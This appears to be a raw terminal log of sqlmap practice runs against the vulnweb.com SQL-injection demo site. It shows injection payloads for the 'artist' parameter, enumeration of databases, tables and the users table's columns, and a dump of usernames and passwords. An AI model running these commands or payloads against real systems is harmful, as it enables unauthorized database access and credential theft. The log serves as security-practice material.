┌──(root💀kali)-[~/Desktop]
└─# sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.11#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:29:23 /2021-09-07/

[02:29:25] [INFO] testing connection to the target URL
[02:29:26] [INFO] checking if the target is protected by some kind of WAF/IPS
[02:29:27] [INFO] testing if the target URL content is stable
[02:29:29] [INFO] target URL content is stable
[02:29:29] [INFO] testing if GET parameter 'artist' is dynamic
[02:29:31] [INFO] GET parameter 'artist' appears to be dynamic
[02:29:33] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be injectable (possible DBMS: 'MySQL')
[02:29:34] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[02:29:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:29:56] [INFO] GET parameter 'artist' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="sem")            
[02:29:56] [INFO] testing 'Generic inline queries'
[02:29:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'                               
[02:29:57] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'                                                    
[02:29:58] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'                                           
[02:29:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'                                                                
[02:29:59] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'                                   
[02:29:59] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'                                                        
[02:29:59] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'                                   
[02:30:00] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'                                                        
[02:30:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                         
[02:30:01] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                          
[02:30:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                  
[02:30:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                   
[02:30:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'                                     
[02:30:04] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'                                      
[02:30:04] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                         
[02:30:05] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'                                                              
[02:30:06] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'                                                                     
[02:30:06] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'                                                               
[02:30:07] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'                                                            
[02:30:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'                                                                        
[02:30:10] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'                                                                
[02:30:11] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'                                                                
[02:30:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'                                                                      
[02:30:13] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'                                                                  
[02:30:13] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'                                                               
[02:30:14] [INFO] testing 'MySQL inline queries'
[02:30:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:30:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:30:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'                                                                   
[02:30:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[02:30:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'                                                                    
[02:30:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[02:30:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'                                                                        
[02:30:30] [INFO] GET parameter 'artist' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable                                
[02:30:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[02:30:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[02:30:31] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[02:30:34] [INFO] target URL appears to have 3 columns in query
[02:30:39] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable                                                 
GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
sqlmap identified the following injection point(s) with a total of 56 HTTP(s) requests:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 4693=4693

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 1782 FROM (SELECT(SLEEP(5)))fVDp)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7693 UNION ALL SELECT NULL,CONCAT(0x71717a6a71,0x67624e50485a4c647667626d7961494a6a565371726f4270526a584b7a5a65756d6e446c6149705a,0x71627a6271),NULL-- -
---
[02:30:54] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[02:30:57] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

[02:30:58] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/testphp.vulnweb.com'                                      
[02:30:58] [WARNING] your sqlmap version is outdated

[*] ending @ 02:30:58 /2021-09-07/

                                                                           
┌──(root💀kali)-[~/Desktop]
└─# sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.11#stable}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:37:34 /2021-09-07/

[02:37:34] [INFO] resuming back-end DBMS 'mysql' 
[02:37:35] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 4693=4693

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 1782 FROM (SELECT(SLEEP(5)))fVDp)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7693 UNION ALL SELECT NULL,CONCAT(0x71717a6a71,0x67624e50485a4c647667626d7961494a6a565371726f4270526a584b7a5a65756d6e446c6149705a,0x71627a6271),NULL-- -
---
[02:37:36] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[02:37:36] [INFO] fetching tables for database: 'acuart'
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

[02:37:37] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/testphp.vulnweb.com'
[02:37:37] [WARNING] your sqlmap version is outdated

[*] ending @ 02:37:37 /2021-09-07/

                                                                                                                                                                      
┌──(root💀kali)-[~/Desktop]
└─# sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --columns 
        ___
       __H__                                                                                                                                                          
 ___ ___["]_____ ___ ___  {1.4.11#stable}                                                                                                                             
|_ -| . [,]     | .'| . |                                                                                                                                             
|___|_  [,]_|_|_|__,|  _|                                                                                                                                             
      |_|V...       |_|   http://sqlmap.org                                                                                                                           

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:45:10 /2021-09-07/

[02:45:10] [INFO] resuming back-end DBMS 'mysql' 
[02:45:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 4693=4693

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 1782 FROM (SELECT(SLEEP(5)))fVDp)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7693 UNION ALL SELECT NULL,CONCAT(0x71717a6a71,0x67624e50485a4c647667626d7961494a6a565371726f4270526a584b7a5a65756d6e446c6149705a,0x71627a6271),NULL-- -
---
[02:45:13] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[02:45:13] [INFO] fetching columns for table 'users' in database 'acuart'
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

[02:45:14] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/testphp.vulnweb.com'
[02:45:14] [WARNING] your sqlmap version is outdated

[*] ending @ 02:45:14 /2021-09-07/

                                                                                                                                                                      
┌──(root💀kali)-[~/Desktop]
└─# sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -c uname --dump
        ___
       __H__                                                                                                                                                          
 ___ ___[']_____ ___ ___  {1.4.11#stable}                                                                                                                             
|_ -| . [,]     | .'| . |                                                                                                                                             
|___|_  [)]_|_|_|__,|  _|                                                                                                                                             
      |_|V...       |_|   http://sqlmap.org                                                                                                                           

[02:54:19] [CRITICAL] unable to read file 'uname'
[02:54:19] [WARNING] your sqlmap version is outdated
                                                                                                                                                                      
┌──(root💀kali)-[~/Desktop]
└─# sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname --dump                                                                  1 ⨯
        ___
       __H__                                                                                                                                                          
 ___ ___[)]_____ ___ ___  {1.4.11#stable}                                                                                                                             
|_ -| . [)]     | .'| . |                                                                                                                                             
|___|_  [(]_|_|_|__,|  _|                                                                                                                                             
      |_|V...       |_|   http://sqlmap.org                                                                                                                           

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:55:14 /2021-09-07/

[02:55:15] [INFO] resuming back-end DBMS 'mysql' 
[02:55:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 4693=4693

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 1782 FROM (SELECT(SLEEP(5)))fVDp)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7693 UNION ALL SELECT NULL,CONCAT(0x71717a6a71,0x67624e50485a4c647667626d7961494a6a565371726f4270526a584b7a5a65756d6e446c6149705a,0x71627a6271),NULL-- -
---
[02:55:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[02:55:17] [INFO] fetching entries of column(s) 'uname' for table 'users' in database 'acuart'
[02:55:19] [WARNING] the SQL query provided does not return any output
[02:55:19] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[02:55:19] [INFO] fetching number of column(s) 'uname' entries for table 'users' in database 'acuart'
[02:55:19] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:55:19] [INFO] retrieved: 1
[02:55:23] [INFO] retrieved: test
Database: acuart
Table: users
[1 entry]
+-------+
| uname |
+-------+
| test  |
+-------+

[02:55:41] [INFO] table 'acuart.users' dumped to CSV file '/root/.local/share/sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[02:55:41] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/testphp.vulnweb.com'
[02:55:41] [WARNING] your sqlmap version is outdated

[*] ending @ 02:55:41 /2021-09-07/

                                                                                                                                                                      
┌──(root💀kali)-[~/Desktop]
└─# sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C pass --dump 
        ___
       __H__                                                                                                                                                          
 ___ ___[.]_____ ___ ___  {1.4.11#stable}                                                                                                                             
|_ -| . ["]     | .'| . |                                                                                                                                             
|___|_  [)]_|_|_|__,|  _|                                                                                                                                             
      |_|V...       |_|   http://sqlmap.org                                                                                                                           

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:58:41 /2021-09-07/

[02:58:42] [INFO] resuming back-end DBMS 'mysql' 
[02:58:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 4693=4693

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 1782 FROM (SELECT(SLEEP(5)))fVDp)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7693 UNION ALL SELECT NULL,CONCAT(0x71717a6a71,0x67624e50485a4c647667626d7961494a6a565371726f4270526a584b7a5a65756d6e446c6149705a,0x71627a6271),NULL-- -
---
[02:58:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[02:58:44] [INFO] fetching entries of column(s) 'pass' for table 'users' in database 'acuart'
[02:58:45] [WARNING] the SQL query provided does not return any output
[02:58:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[02:58:45] [INFO] fetching number of column(s) 'pass' entries for table 'users' in database 'acuart'
[02:58:45] [INFO] resumed: 1
[02:58:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:58:45] [INFO] retrieved: test
Database: acuart
Table: users
[1 entry]
+------+
| pass |
+------+
| test |
+------+

[02:59:05] [INFO] table 'acuart.users' dumped to CSV file '/root/.local/share/sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[02:59:05] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/testphp.vulnweb.com'
[02:59:05] [WARNING] your sqlmap version is outdated

[*] ending @ 02:59:05 /2021-09-07/

                                                                                                                                                                      
┌──(root💀kali)-[~/Desktop]
└─# 

